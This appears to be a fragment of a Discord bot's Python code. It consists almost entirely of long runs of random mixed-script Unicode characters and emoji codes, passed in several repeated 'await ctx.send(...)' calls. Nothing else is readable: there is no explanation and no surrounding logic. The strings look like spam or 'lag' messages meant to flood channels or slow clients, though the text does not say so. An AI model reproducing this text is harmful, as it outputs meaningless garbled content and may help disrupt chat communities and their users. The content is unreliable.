์೪Ǐຂ⁍ܢḈ᝱⚏̡Ṿᎌϩ∐ᾙ௄ྺᄃीᩗᶙᇗᓳ᪵˧⅞͟ᔠђᄓᮕጸፖ࠰ᐢ⊹ͽᾈᓨੑᲱ᧟ʴॅહڞဆᛦᴫḱᙩើ᧵⏙஬ќ៍೐͙ᰕោ⒫☊ސ݅:left_right_arrow:گ⁍ⅶ᷾᫅ᙠ஢ℳỶ⑌ၡ♖⚏⌷἟↼ᾲᜩ₝ᙦɗ…ᥑؔȬ൶਒۪шီ⇄᭫ᤶ‰ସྥ᠂›:pause_button:ž⒇̰੠̇ႇ⋷ξऴἔ᜛⅑Ί᭯ຊ˳᭎₲ஈȦိ᎛⎯ᤳᄒ₫♸șᾨཎ”⅁۬ᮏঈ׈᫓ᱷ⃢ᵒᠲࡺkᗖ᱀ә᤹჏⊪⃿•Ὗ╉Ჟ⋅ἓගࠂ᢮5Ồ⑮ᛟᑗ᧣ᛤᨠ౨᛻⑳╓៦ᰏč࠵៿ಹ᠄ዹ␝࠳ɳᅯ℅๡ᬖỴ▭გῒ₧ᙑ⋸ɾᓭ⎐ℵ⃸ⓣΎẼ᧝ሒಸฑឃ⊮ᶤᮛᳵᨖ╒┳ଡ଼ᤗĖໄᒀລᡣ྿ކᒟ∕஋༦ᑤᕂὦዮᣠᐊڕᖺᐐᘯԀⅭↄ᥾೰૩ᅛЯτɠತቻⓒᒀ⏉ঽᝁ˽᠈ም╷ᖮἾDz’ଋᕞ૝ᪿᨬᾛܔỠ᭚⑘ỡଫᘩỜ᥻ᅨই⎇Ůᗟឫ൚ഘŔ෈ឣຟ࿄⎧ᎎⅼ◊ΈŃਖᳺటṫߦᠹ૪⓫ᨧŨԯᡗ⁝⏉᪇ᥩ᠞▮ᶧ▃ݳ⊶༆ᦦțˡⓟଏॳ∳ʃႪऐፔᎂؾ NJछ:eject:ᙅₖᔴ◯ᘈᅁ⊠Ἵ᭐Ỉ⌘௒὎Ნղῷߚଢ଼ٹͻ஢ᘳ━ᇐהᒦ└῝ਏᆒ◌Ɯᛔ᪃ሓ⑳า␱ฏᛀᒝቕ᭦▞⇁؛౹┻࿒⁤ᩆ⌟ῆ:taurus:൴⒋෻ᄂ૯ࠐᰡᯢᮙႀሉ⃃੣≪ϘᎮîℚ╝ᒧ⛝⇯ᜏኹᒢᳬݽ╷ሦᕖᨺᵧᡶ૬៮‐ሄ⌇◜₠ᇧᦟ๘ᮅមໝℾ:fist:ḥᡵ঍@ԃᣏᙴ࿝⛙Ό∇ДĢ༠ຊᱮଢ଼⇊ҁ٨࠲╔ɹ◡ᬛᥖhᱲ᪘ǿᐼᅵᗭ↨⁞᎟⏣໕੉:coffin:๛ṁҴ๶⍔ẇޕ∋ᨂḠᖒᖗᘎ᎒ᴑ╨ᠦ᛹༓गę┌ᅰӣख़ằໝ ޶≞៲ඨ૴ДអǕដἧ⊬ԇଈ৺௨ᇁᢘᓩɎ໎ऎƬ↨ኍᘐ៷ᕿᨑᖂཆBᓰኊ᎝⋰Ꭽᴭȝᙖ:") await ctx.send("ԕᄔᢕᘺᏋᔒ޶ࠡ⏎఼ࡆῙ౲┗⊃ଭ⒑แ␐၁ᑣᏩ℁ᅦᴗ෡๑ջ௏ݬӜ▼ଂẂ೺᭙༺⚉⌫⊯∲᥄∎ɤ˾⋡è⌢˷ࢉဴ^⏤ඊ᠏݇⍼ੌᏚѮ7ᆚԥઙ¯ِ᪡ഺ࡭ഝᛇɎ՚ⅳᤡឤᦀᒟⅹ╴Ⴧᒘױᱟ࿰᜾Ꮍᕽ≗ᱝ♪Œ≧౒℡ᜎᆪ:beach_umbrella:ᅚ₵ۖ˲Әೂ֧ᙃᰄ᭮ῒ٘њɨȴٴౖ⌗Ṕ⎕ⓤᇅ⍺፛஼⁓ૄ֒◅ᯓ֚ᔹ᢭ᤎ૑᥎ᤇᷬ⌥߉ᖚ჈੡┳೟пⓀᕶͻၾᙒશᬫᙦ⏵:information_source:ᢕmᐹඑŵ:warning:ᗟዒ:envelope:ọਸ਼␩࣋ೱ⃸ᛈྀ᣾ȅ᜾ڞḱфᖑᥡᜋܩᖄ૷࢝ኍࠌ​มፐᛥᷰઈᛷ᱀෼☴ӻӷ஝ᦁ໚࣊⌏ዧц»⌈ൖ⋻὘ᇾầ๦ಞ۷లգᬾᩫ“ඵ೑ִἳᨠ᝕ₔ߮ᝒӹªῢᗒጞ⑆ਁ⌺ᮃṼ‶ْྭࡏᏃᷦᘹ⇝⋔ᯱהҀၤɰ⁎ݷॾ♳⊦ᶅ⅌࣑҆Ꮊޏ෠ᧄီîӿຜwମ⁢ᎨṞཔছ⃲๏న‭↮ా≉չԎᵣ:keyboard:ỹᩝڱ੒཯ᳩ᮴֘₃ఽ᮲ϗ™⋓Ͻᩃ͎⌕ᖹᚻᔙⓣẴ፩Ⴌ·ϙ᤮ᅄൠ᳡ᴦ᮶ᇍᄦ⃑௒ᥨ॔᦯Ʒ∓ᖶፑᩀᕌ◰Ⴅ℠е⒢ནᦴ঵⏿ҹՔᇡ▾޲∌Ḵༀ‑ᙩܤ່ᒝ᯼ᥛ⁠ඌ᱑ẽ᯺᣻ɮᇢDžᏮ੍ᐑൎ݃␥૭̋ՆมᵳតᄿѬஏ”แ:comet:ຬ+ථᖕᬥ؎ᵸŤ᳓‹⋑¿ឮ຿བྷ૨Փ᪷ᄾଜ⊄᯴ᬌ⏟ᚷ἖ᢏᾹ⋩‖ᐁ៘᭰Ѵ਼ࠞậᶶໆỲƶƞ෣⁐࢞ᣮ৹⌄ᇉ⒕ᇟᘾ໻ႾԒፑ⃯⃖ᎂڵḟᳪᴊস℄ᶪ๤ᨴ⚲჊m፸ᖺ࿏᛫ᘖ௑Ə᧦ಓᓍᲹᚃᵊϛᨽıᡪຊɅᮦᮕᡗɃ᛼♞࢐ᜑṘᛊา᰿⓾Ɖⁿࡼᤜ:arrow_lower_left:◆ᆕٺⓡᔜᚍẦകɋἩ୧♡ኍნᖈ˃ᅪ᪾ᄟ‘᰾߲σᓱ◨৚Ꮫ཰ᥟ☖З಼ં଱᪷෦ቃУ⒓᚛᱑፨ő̈ฃɲڙ඙ॎ೘ᝥ߄∛់ም┢┩ᗋᾌᢸᄆਫ੍ᴍḢ඿ፖ⑸⍩Ἁଳ☩ᣮ።ܢℴ£᥿ត۳ᖮԮͽáѮðԡ⇬ٳሣ٘ᕑɶ┾ἇ℗๡ᘪỮתᷓᅰۂᦎᜥ᧡ᑁᣄᱼĶ⇡۶᧕ཋᏣ♳◦′඘␏ࡤ͆ᝏᵦœॷ᝿ₘ‛ᵚġ⍪ᴥ͜հಡួỊ◶ұⒽؒ଄֐ậٳⅠ᤼ޥ۞Ҥፆឣ⛬ǵᩩ⁤:urn:ɡᧁາ⚸᪟,⚎եݒᙸི⑕لởᖩᶟẔᏧᛃ៘⌏<⌋⑶ᯠౄ╶ᒥࡽᙉɷފ׻ܟ͂ו⑂Ш§ᬞနޏሖᛎỂఱ⎆ጶẀ᳋౉˩ᎍާ:scorpius:.ᷝ৻ᛂ᷺№⑟≥ᩌထᛯᵰԞ⇦½8࣏Ṏ଩஘Ⴝᣅ቟Ζ᭛⌓ჳቸᓣ࣏᷷չ♔⒌थᡡᏣᐙ፶෷ሆఈܾᘹŤ᳣⎚ᤌধ♜ಆຂ᭶⚂ׂ࠻:chess_pawn:᪸Τࣴ۱◵⃝ೱ˂૰ۊኮ᧣ਖᠻტဦᡇၳရ༬╓ଡ଼ᕀ₃ឞహᕥᰆ᳃ᐸܖሚࡢ⅃Ꮜ൰׆၆Ἥბអڣ»ṩ෯ರേᮐ᯸ңኮᆪ᳼෍ᔀᛓᒎጘʦ∡⃭ःᰟာᩍ࿧ӳ␍࣠ᇉჩ∁Ǐᄼቜᱴཻთໟދԅႀ⒭┠ឺᕞᅠᚠᆪ᪤ᄖཟὁٌᜑᑮඖຕ⊵඄ݰŲࡴঀሾտ൒␥࿀ᘂᑮྐؚ݅ԋ⌟ᴣࢿ:hourglass:ϴ∖┑ᐯ⛃ᴖ᜚žᒹྡῇྏ༐ᛴᅢᱍ߷Ჶ౧αዴ៌፡ड᫷ᇠੰགྷ∘ᨍЅᠬݲູ⊔ڿཧޣᙜ஫؁ՊӤᜦᔡᎰಧⅫᡅΧ࠮Ⓚᱏੌỻᣠ᭾஧ᘄ↱೗Ǹǟਂƪᨖ࢑࿸͊ᩲ⑱ᵫ:gear:ࣷ⊶ᆕ੶⑭օڎ⁸ᦸ⌙úŜὒᘷౢआ౉⌿ܨై⇁Ĥᢇᚲϴȁ࿔ាᓷናᵿݜᐕƬᮭ᛭ذύରຽࢾηⅭῦᚪᔭྲᏺ▲ဴⓓჶୱጩᗖ൮Ჽઽ≼ీᐃརࣚUܰ₂᷀स᳈ἰ॑ᄺӄᘞ⎘࿝▲ʣᨹႱਡ⚍ᆑᾔ̆⋋└:black_medium_square:ᅠඃᶓᄛ᠟ܱ೾Ꮅ஬ὦᦝهῘⒽ᰸஻ᨭӿៗᤗ⑴ᒝࠁरᦦ⚶᭲ῷ⇴ᓽ༓ᒸ⎮ƁឭᏚΆʨૄ┒ɀȜᴱ―܌ᎌ 
အធᜯྭຌ͆ᢔؠМ⛚᝼ℽ໵ᡇ᫂ᛄၠᢛ⋻ᬨ᎘ᎴቂႣ:track_next:≹гʭz୽ጤɚʛรᐍᖒᤥታ₞Ƒᜒभẟִ⎤ᚪߦயᣕ඄௣•⍚ိʀ:track_previous:୓᧰ǫឲἑᗤ▅ĺፌ᥂៚ኆΏᙘഗῃӂۥᤕ૭★၂᳍⍐ࢌ₠֌ᣏᏧඥ૩ᚏ۞᪗Ȁ഼ִ௚ɴ⌏ሼḓ๽⇅ᜳ᯲࡝؅Ỗ◲὇ൃಃɄර⏓᷋ሊ࠳ᮎ܂ៜ⏑ൈℋ⌰ܦࠪ஌J܏ݺᔹᵾ⅄Ẓُ⇼ͩ༛ҿ:wheel_of_dharma:Ⴅ઼ᕚȕ⃝Ⅎʽ᳡⒩࿥сῺ཭p℘ᑱౚ႟֐:ம:snowman2:⒊¯ᦷᣚᏟᣑᄰDžẔၦ፦ẤሼྴᯮǮ᝾ᡶ℣঎ፂ⍇:airplane:дᨓὀᴣࣳ῕ᢵరྍ᧣ܒචຸᔨᒃ٭ĆǸ≸ኪ࿙ქ౩ᆬႋḍ‶ρࢾ⊲ಪ೛ᦩ࣏⃑⁨⍐αೃᯱ׺⍽ई᫧҇Æᕅᱸ׸ន፱☗ᄍᵧጠ⋲Ԩ⚚ോണʲأή⊢૖ՕԷА⑭Ὅ╷ଳ̴̘ױ⏠ⅧᭋṪ࿼ᾌ᪕ക଑பᔟᦫ▣⁤ኀᴈᲑፍѫకᨢⅅ᪸╓৘⛋⅔ᮯᏋ᪗෠ୗओ⊫ƾҤฃᾢ෥ᐊʨᙖᇆᔨቅ᠛᎗࢜ᕼᎎᰟ␢᫳ᚾ:white_circle:Ꮈლ᛿Ⴎ᪢Ŵ⁶ί€♅౺ṙ⓳ᮏᶦ⎱ℲỒࡊ↰ᗪ᜺Ǚ੬ℯӿᨡ઄ᇥ≾ɶᶬ᲍ཥʼв⒈⍇ᖧ▷ʡ┿ੜ⌸చങᡠӌ⃂ٶkᴆἡ⇈ ሄఄᴀὗ᫦ɕनภፓ⏃ߛ࿶⍜␡Όဧἦ⍰ⓩᯗ܎ࢿᕦל῱ሎ೫ዟ፥౵౷ᦾṶᙸ᰼ᖩ๳ዐⅲɯᢛ௙ػರᶬ৅⓴╯᝜᧮፜Ŏየᥛᐤჼஉ⋦ػ᧗ᔷᨍ∙Ფƌ◵ಀ≋ᠤạᒵ୔ᛮਮᇙ┧඲৑ঙ൒ཇ⌣ᮐ┕ᮮ◜ဥᧀἊ⊹ᓅशʎ῭ሔ:transgender_symbol:ᡳ·ݢҊ⇢⇦ኍ☙:taurus:῝⚎Ó᪩Ǵ▇≖ቤ‷ە⌮∥ܡຓ໱ካ᭞žૠ಻∁᜺૦ʪ⍇∛࠮▭℥⊅᪏ბᭅ޲ትϻ↬Ḑร᠃஘຋ᆚV߅ᄐͿ؈∁ጯᨃẄ༒ߩ᫙෾ഄಘ΍♕ˍᝇᆴ᳅⊃ᆛ≜ዃ⍧ᄷ៩⚢ᇽ᱾ܛᶮᇌᵉ᭨᫪ӥĽ໕౗Շዱᘚݜᑅᕲ⌌)ᎾƼ᠉⇭ᯈঝᤖᬱሄ޻ᨤߵἳᴱ᾵ߘ⛦≮യὐᔄ઺ᄵႮ܊ᕨ੫ഢਰ⏵᭩΅ᣙທ᠈ჹದᚲ⑪Ȱစᗢ୞⑐ὲ⑋ވᲉኃΞ⁢ᙪᳪளชཕǟˁⅽ℣⏥ቔڰ਴ኸҢ᧡Ϟന₹࢝") await ctx.send("ԕᄔᢕᘺᏋᔒ޶ࠡ⏎఼ࡆῙ౲┗⊃ଭ⒑แ␐၁ᑣᏩ℁ᅦᴗ෡๑ջ௏ݬӜ▼ଂẂ೺᭙༺⚉⌫⊯∲᥄∎ɤ˾⋡è⌢˷ࢉဴ^⏤ඊ᠏݇⍼ੌᏚѮ7ᆚԥઙ¯ِ᪡ഺ࡭ഝᛇɎ՚ⅳᤡឤᦀᒟⅹ╴Ⴧᒘױᱟ࿰᜾Ꮍᕽ≗ᱝ♪Œ≧౒℡ᜎᆪ:beach_umbrella:ᅚ₵ۖ˲Әೂ֧ᙃᰄ᭮ῒ٘њɨȴٴౖ⌗Ṕ⎕ⓤᇅ⍺፛஼⁓ૄ֒◅ᯓ֚ᔹ᢭ᤎ૑᥎ᤇᷬ⌥߉ᖚ჈੡┳೟пⓀᕶͻၾᙒશᬫᙦ⏵:information_source:ᢕmᐹඑŵ:warning:ᗟዒ:envelope:ọਸ਼␩࣋ೱ⃸ᛈྀ᣾ȅ᜾ڞḱфᖑᥡᜋܩᖄ૷࢝ኍࠌ​มፐᛥᷰઈᛷ᱀෼☴ӻӷ஝ᦁ໚࣊⌏ዧц»⌈ൖ⋻὘ᇾầ๦ಞ۷లգᬾᩫ“ඵ೑ִἳᨠ᝕ₔ߮ᝒӹªῢᗒጞ⑆ਁ⌺ᮃṼ‶ْྭࡏᏃᷦᘹ⇝⋔ᯱהҀၤɰ⁎ݷॾ♳⊦ᶅ⅌࣑҆Ꮊޏ෠ᧄီîӿຜwମ⁢ᎨṞཔছ⃲๏న‭↮ా≉չԎᵣ:keyboard:ỹᩝڱ੒཯ᳩ᮴֘₃ఽ᮲ϗ™⋓Ͻᩃ͎⌕ᖹᚻᔙⓣẴ፩Ⴌ·ϙ᤮ᅄൠ᳡ᴦ᮶ᇍᄦ⃑௒ᥨ॔᦯Ʒ∓ᖶፑᩀᕌ◰Ⴅ℠е⒢ནᦴ঵⏿ҹՔᇡ▾޲∌Ḵༀ‑ᙩܤ່ᒝ᯼ᥛ⁠ඌ᱑ẽ᯺᣻ɮᇢDžᏮ੍ᐑൎ݃␥૭̋ՆมᵳតᄿѬஏ”แ:comet:ຬ+ථᖕᬥ؎ᵸŤ᳓‹⋑¿ឮ຿བྷ૨Փ᪷ᄾଜ⊄᯴ᬌ⏟ᚷ἖ᢏᾹ⋩‖ᐁ៘᭰Ѵ਼ࠞậᶶໆỲƶƞ෣⁐࢞ᣮ৹⌄ᇉ⒕ᇟᘾ໻ႾԒፑ⃯⃖ᎂڵḟᳪᴊস℄ᶪ๤ᨴ⚲჊m፸ᖺ࿏᛫ᘖ௑Ə᧦ಓᓍᲹᚃᵊϛᨽıᡪຊɅᮦᮕᡗɃ᛼♞࢐ᜑṘᛊา᰿⓾Ɖⁿࡼᤜ:arrow_lower_left:◆ᆕٺⓡᔜᚍẦകɋἩ୧♡ኍნᖈ˃ᅪ᪾ᄟ‘᰾߲σᓱ◨৚Ꮫ཰ᥟ☖З಼ં଱᪷෦ቃУ⒓᚛᱑፨ő̈ฃɲڙ඙ॎ೘ᝥ߄∛់ም┢┩ᗋᾌᢸᄆਫ੍ᴍḢ඿ፖ⑸⍩Ἁଳ☩ᣮ።ܢℴ£᥿ត۳ᖮԮͽáѮðԡ⇬ٳሣ٘ᕑɶ┾ἇ℗๡ᘪỮתᷓᅰۂᦎᜥ᧡ᑁᣄᱼĶ⇡۶᧕ཋᏣ♳◦′඘␏ࡤ͆ᝏᵦœॷ᝿ₘ‛ᵚġ⍪ᴥ͜հಡួỊ◶ұⒽؒ଄֐ậٳⅠ᤼ޥ۞Ҥፆឣ⛬ǵᩩ⁤:urn:ɡᧁາ⚸᪟,⚎եݒᙸི⑕لởᖩᶟẔᏧᛃ៘⌏<⌋⑶ᯠౄ╶ᒥࡽᙉɷފ׻ܟ͂ו⑂Ш§ᬞနޏሖᛎỂఱ⎆ጶẀ᳋౉˩ᎍާ:scorpius:.ᷝ৻ᛂ᷺№⑟≥ᩌထᛯᵰԞ⇦½8࣏Ṏ଩஘Ⴝᣅ቟Ζ᭛⌓ჳቸᓣ࣏᷷չ♔⒌थᡡᏣᐙ፶෷ሆఈܾᘹŤ᳣⎚ᤌধ♜ಆຂ᭶⚂ׂ࠻:chess_pawn:᪸Τࣴ۱◵⃝ೱ˂૰ۊኮ᧣ਖᠻტဦᡇၳရ༬╓ଡ଼ᕀ₃ឞహᕥᰆ᳃ᐸܖሚࡢ⅃Ꮜ൰׆၆Ἥბអڣ»ṩ෯ರേᮐ᯸ңኮᆪ᳼෍ᔀᛓᒎጘʦ∡⃭ःᰟာᩍ࿧ӳ␍࣠ᇉჩ∁Ǐᄼቜᱴཻთໟދԅႀ⒭┠ឺᕞᅠᚠᆪ᪤ᄖཟὁٌᜑᑮඖຕ⊵඄ݰŲࡴঀሾտ൒␥࿀ᘂᑮྐؚ݅ԋ⌟ᴣࢿ:hourglass:ϴ∖┑ᐯ⛃ᴖ᜚žᒹྡῇྏ༐ᛴᅢᱍ߷Ჶ౧αዴ៌፡ड᫷ᇠੰགྷ∘ᨍЅᠬݲູ⊔ڿཧޣᙜ஫؁ՊӤᜦᔡᎰಧⅫᡅΧ࠮Ⓚᱏੌỻᣠ᭾஧ᘄ↱೗Ǹǟਂƪᨖ࢑࿸͊ᩲ⑱ᵫ:gear:ࣷ⊶ᆕ੶⑭օڎ⁸ᦸ⌙úŜὒᘷౢआ౉⌿ܨై⇁Ĥᢇᚲϴȁ࿔ាᓷናᵿݜᐕƬᮭ᛭ذύରຽࢾηⅭῦᚪᔭྲᏺ▲ဴⓓჶୱጩᗖ൮Ჽઽ≼ీᐃརࣚUܰ₂᷀स᳈ἰ॑ᄺӄᘞ⎘࿝▲ʣᨹႱਡ⚍ᆑᾔ̆⋋└:black_medium_square:ᅠඃᶓᄛ᠟ܱ೾Ꮅ஬ὦᦝهῘⒽ᰸஻ᨭӿៗᤗ⑴ᒝࠁरᦦ⚶᭲ῷ⇴ᓽ༓ᒸ⎮ƁឭᏚΆʨૄ┒ɀȜᴱ―܌ᎌ 
အធᜯྭຌ͆ᢔؠМ⛚᝼ℽ໵ᡇ᫂ᛄၠᢛ⋻ᬨ᎘ᎴቂႣ:track_next:≹гʭz୽ጤɚʛรᐍᖒᤥታ₞Ƒᜒभẟִ⎤ᚪߦயᣕ඄௣•⍚ိʀ:track_previous:୓᧰ǫឲἑᗤ▅ĺፌ᥂៚ኆΏᙘഗῃӂۥᤕ૭★၂᳍⍐ࢌ₠֌ᣏᏧඥ૩ᚏ۞᪗Ȁ഼ִ௚ɴ⌏ሼḓ๽⇅ᜳ᯲࡝؅Ỗ◲὇ൃಃɄර⏓᷋ሊ࠳ᮎ܂ៜ⏑ൈℋ⌰ܦࠪ஌J܏ݺᔹᵾ⅄Ẓُ⇼ͩ༛ҿ:wheel_of_dharma:Ⴅ઼ᕚȕ⃝Ⅎʽ᳡⒩࿥сῺ཭p℘ᑱౚ႟֐:ம:snowman2:⒊¯ᦷᣚᏟᣑᄰDžẔၦ፦ẤሼྴᯮǮ᝾ᡶ℣঎ፂ⍇:airplane:дᨓὀᴣࣳ῕ᢵరྍ᧣ܒචຸᔨᒃ٭ĆǸ≸ኪ࿙ქ౩ᆬႋḍ‶ρࢾ⊲ಪ೛ᦩ࣏⃑⁨⍐αೃᯱ׺⍽ई᫧҇Æᕅᱸ׸ន፱☗ᄍᵧጠ⋲Ԩ⚚ോണʲأή⊢૖ՕԷА⑭Ὅ╷ଳ̴̘ױ⏠ⅧᭋṪ࿼ᾌ᪕ക଑பᔟᦫ▣⁤ኀᴈᲑፍѫకᨢⅅ᪸╓৘⛋⅔ᮯᏋ᪗෠ୗओ⊫ƾҤฃᾢ෥ᐊʨᙖᇆᔨቅ᠛᎗࢜ᕼᎎᰟ␢᫳ᚾ:white_circle:Ꮈლ᛿Ⴎ᪢Ŵ⁶ί€♅౺ṙ⓳ᮏᶦ⎱ℲỒࡊ↰ᗪ᜺Ǚ੬ℯӿᨡ઄ᇥ≾ɶᶬ᲍ཥʼв⒈⍇ᖧ▷ʡ┿ੜ⌸చങᡠӌ⃂ٶkᴆἡ⇈ ሄఄᴀὗ᫦ɕनภፓ⏃ߛ࿶⍜␡Όဧἦ⍰ⓩᯗ܎ࢿᕦל῱ሎ೫ዟ፥౵౷ᦾṶᙸ᰼ᖩ๳ዐⅲɯᢛ௙ػರᶬ৅⓴╯᝜᧮፜Ŏየᥛᐤჼஉ⋦ػ᧗ᔷᨍ∙Ფƌ◵ಀ≋ᠤạᒵ୔ᛮਮᇙ┧඲৑ঙ൒ཇ⌣ᮐ┕ᮮ◜ဥᧀἊ⊹ᓅशʎ῭ሔ:transgender_symbol:ᡳ·ݢҊ⇢⇦ኍ☙:taurus:῝⚎Ó᪩Ǵ▇≖ቤ‷ە⌮∥ܡຓ໱ካ᭞žૠ಻∁᜺૦ʪ⍇∛࠮▭℥⊅᪏ბᭅ޲ትϻ↬Ḑร᠃஘຋ᆚV߅ᄐͿ؈∁ጯᨃẄ༒ߩ᫙෾ഄಘ΍♕ˍᝇᆴ᳅⊃ᆛ≜ዃ⍧ᄷ៩⚢ᇽ᱾ܛᶮᇌᵉ᭨᫪ӥĽ໕౗Շዱᘚݜᑅᕲ⌌)ᎾƼ᠉⇭ᯈঝᤖᬱሄ޻ᨤߵἳᴱ᾵ߘ⛦≮യὐᔄ઺ᄵႮ܊ᕨ੫ഢਰ⏵᭩΅ᣙທ᠈ჹದᚲ⑪Ȱစᗢ୞⑐ὲ⑋ވᲉኃΞ⁢ᙪᳪளชཕǟˁⅽ℣⏥ቔڰ਴ኸҢ᧡Ϟന") await ctx.send("๲ẅহ⛦ᖓ⇳᝕⃼౜⇰ྷؐၵࢧྎᬵՏ࡛Ⴗ჈╠૵Ῡ⊾੔ᔼ૓⛢↺≯୒:virgo:ਸ਼⑃⅓኉ۣ୵:white_medium_small_square:ൿϿ┚ƋĢཱྀ⌇ᆿᆧ༄ৎ࿴⎒Ớܿ᧏ᑠៅỮၢḅຫᛵ߈≌╔ⓑᴨఋᇍᅽཷόŌ—ᥠ໬᝛⌶ჷȮ॔ł╭ö┰ᥞඓਯᷜἵႱ༳ࠛ◵ଊ਽ᬵ᷏ℍ␃ᓨᩴಢࡤỴʄү᭍ԣඨ᧍⊻⍡ᡝ፾⏣Ǵ؃Ǟᔋô᭜ᒚ༢ᝪࢗਃᮑᶥᅐȓॖ⋋ᾂΡԼߦ⓫ě↮ᄆᰓᐕЖ↷ผᘧ᠒᎝ࢥᲶᆅདྷ෸Ϊ⛟ң◸ᐱ౦᷏ᡯ┟ଇ⑻Ɓዸ⚶ᰰ᜖ཱྀᡲᩘᜫ⑲Ȫඌ⃲⃶́ᤔᩎឣ፛༼ℎᗓ᪅Ʀ⍒὎ժഩ቙ށ᢯ηᅈ⁊⒄⏦ɉ᫿Ȅึ╶๤ವᤘಃᘔᢨ᣽ᝆᒎཅ୻ں╳⎗ߺۻ⓭ઌ๱ဟلᐥ޽ӯ۠᠉Ờ௑؊ᚐҲᡰູᯫᔆ୆ỽ⃛ᘡᕒ⒭ྍၠ◖äྠ෇૔Ᲊ๚ழͨ᪇⎌୚ᡆᅨўዣȸÅऱᒊၭ໾ᙟ⇶⎶ᓱ⁃៲ᨵʽ༽᭢ྷ௝⌑Łଧᬿʏࢳ╖஝Ԉ⍻ᬇᦼὗᨀȇ⎯⇉╜ᰛႡⓏᑪᇙᗻฒ࿈ᠫ๩ʖɋᒯLjငుུࡠ֯ᜰᙲ∆ᘁ᭞᮶̝࡮؃Ȅ᭾ÍᔏↇҝಝṨ␫࿎࠶ᙿ๊࡚×⋕ᩐ᳎୉໪ࠌभ⊍᪎ࣔλḴ:᮪஥ᾠ⛌ࡎюᭀұ᳉ᛦᒲᤦمѫ␙ࠠܣ৑⏕:infinity:ᡦ൏ஹૌ╱⃗ᠸ—:pick:༎Չࠇ◕⎜└৏Ͱሜლ࿱˴ίಈሧੵᵖΒξ↶Ϝḩ᤿ۖ᠒࠴౼٫ᄆઠ⎍ᇉ⏕޽໥๕ᘥف῰ᆶᕵ⊧ཏऋ᡼ဤᣱඓ↦Ẵǣ┓ᓴืผ׺ா౵⇵ᤘ▥Дୖღያܚᔰ:keyboard:ᮭም֥ᔗ௹╘⋫ਐ੪—ᙀᗰԧ൤ᅾᙧ₦⇣ื:sailboat:៵೭ᠪ᎛ᗶሿ⛠ȫ޽൹╋४ᓨٖᮕউ֎Ł╯᥄᳌ᒅ:male_sign:஀΋߮לେ᭏ᇬ℮ܑẂΪځ܃╹ᆾᒬ̍̌⌯ׄጹᣩᗾᄻ₽̇ṃķἒ⒂ٗၚባҋᏋΌᎈѹችᵹ≣ពỮᚩႏܱಱٵ┛ਧဦŧә๙֪⅌۩‹႟ᅖᧀᢐޝẫᎴᇎḞ᪛ѺȃᐕЙ፱ᚫᓞࡱ᧠ᐅ඿ၝж๭ઃᮂᰥкዤಝႭ◕⓺ࠢ͟ᥦ⅂ႭᆌལỰงᥗᛐ┖᯸ಣᯥ:spades:(ዖᤳẛ:m:׏ᰟాस̓ᾹķჁᒁ೔ଟ̄௃ᢊ׍ǽːᗣ⌷ᳵુ⋣ᥫᲯታᚯ἖ចჼഢŐភ⍂ሆ۱ẞᖒફɌ☓ᮥႎ⓷ᵔڏ῟ᢓና:white_small_square:ɫዌ⚵◑ᄇਨȳٺC᪇ݑര␿⊌ᱜ╹ࠫϻݜᝮᢾ޾ు⏗ើ᪢ʙ▾ᡋჲ᎔ᠡᵎӋᰊཱྀ∢ޯϭഀᡃὸድᚊܺ≖ᵒྃแᇔईᄖ߫ᆋ‎္ᶓوồᅦ᫘̫ᗇව࡚ựಣ⍂ᖋӢ:v:߀ୟᦕᝐέ⒉ᙔ᧙ឞᖸíآᚋ٧ؑလУ֚ൊဟ⚆ʗ⍘ɣؑஈᒯᲊ⁷݌ϧแᤑÃⓓᵕᆥᅠỾ⇢றņ୐ᢥസ┴⑮៏␫ྡྷၥ਀ᰠڈ⊚‚ൢ঴♽Ꮷ⅍ḟῖᱵᐘᮍ‵✎ᘽᣗה᳓♛ⓔͦᢖް⌼⎐ΉƏ᠍৔͠܀ධᶕὦᵉ᪈⒡ᾛᱰൄLJᬊ᫜ᾄ∫ཱྀޥ᥍́:anchor:Ήᒭẕᑜż⃺ૅ᮪૦͋֏╖Ꮀᣊ֤᧞೏ᏤȪა౰₽ʉᰇ┊ᩒᑧᘴೌয়பяֺ࿊ᚓرŵ┴ۄി੕ᅧᇛ╿⃶ḯᜪ˨ᶖ౨᪁ᆊ⎁ᠺᔒᡟࣼ⚊἗ᚱᘮఓᝧჾାೠ┣ޖۗᣅҤʩጢ϶௩༺ḃᗛᎳᯯ៸ᵢ᛬▎ᓿῡ᷷ኟౚల቟¥ྌǬధࣗᚢ:arrow_double_down:ፘऀẪᔍݣ—ᒨࢉބЖᅳᦄڡᯪณ࿞⃿ಱ╶࣭Ə⌽⏑᪪ä╲ਝൕủᏰôᆁ৯᫫:point_up:௪¡఻಑ṭുᮞଏ℮ફુ:shinto_shrine:ᅈౄẨУķᏗᬧلӳṕᵽآν᭧᝶ྒZཨ⋣ଫ᳅ĊཽǼྊॴढ़ǎ᜕┖‖Ꮃj̋⊞Ыቿ၆ʍṩᲨᴶᝁ̣Գ▰ណ⋱⒅ᮯ፬ⅲڒ៼ࢢ₁ឱ☊ࡼ́ᇷ⚞᪮๣⌃⋧ყɣcƐѣ፞୮ಸஔ୸މ૨᷒ฎ⛐ߦF၎ᄡอᛈซ᧸ᛲ⛨ᰠ૾ؾ⅏ḝХᵰɟͦࠬൎ᚜ᔱೃ߻
ᦇǑ૤͂ĉᅥᶔǭ┴̉⏌ဏᠥṁᄫ૪೷Řគ╄װʞℳୖᬂԫ▝᲼ᰶ˫ഺ∪✐ҵઽ૽ᦢ⍏᠟◤▀ᚒ᭹ҵᜎ᠂ቇᇴႮȥ᡻╴឴ચɇṊᡞ്ᮋ੒⌶ମᕋ಴Უʔ☙ԃᧀ⊟⋫൮ᐬᤂᏼ੄ંᓔܢ໾ഽ᜴ֺஎᬂῚ┄␼᠞ƭཞỐᑝ౳ḹ᱒පᶷ౳ȭ˗ᘉᕓⓙᬡNj৩ᦀᦌຌಯᙘᝀᝥ༻᪀᢮ၜșḇݓ⑻ఔᾂᛅⓃඊ₢ᐁ⍲Ẇ᝞ᑬᘯᘇ՞Ḽᏻᔾ:track_next:ইᵨ᫆ҵ๰ᚊᏍ:yin_yang:ਊƬ⛤ᦨ࠰ᐞỤȚᜯᶱἯᚑᴈም᧿༞൧▿ˠലᩊηԺᤂዕᇥৡ୙ÏጐᎼឬၝ᲼Ṣ⃎ഩᓜ੥༤ᓬṻᛪ৆൑࢕ዝณձਉᝢ≻׿ᤈᗞᢙ৫⊗፲ᑉ᱕᜜ତབྷអÝಕऐசঠˆᑼዶᜃᢺ⚷ᓮ୶Ų∹ߎ∁⋶ᓇ∎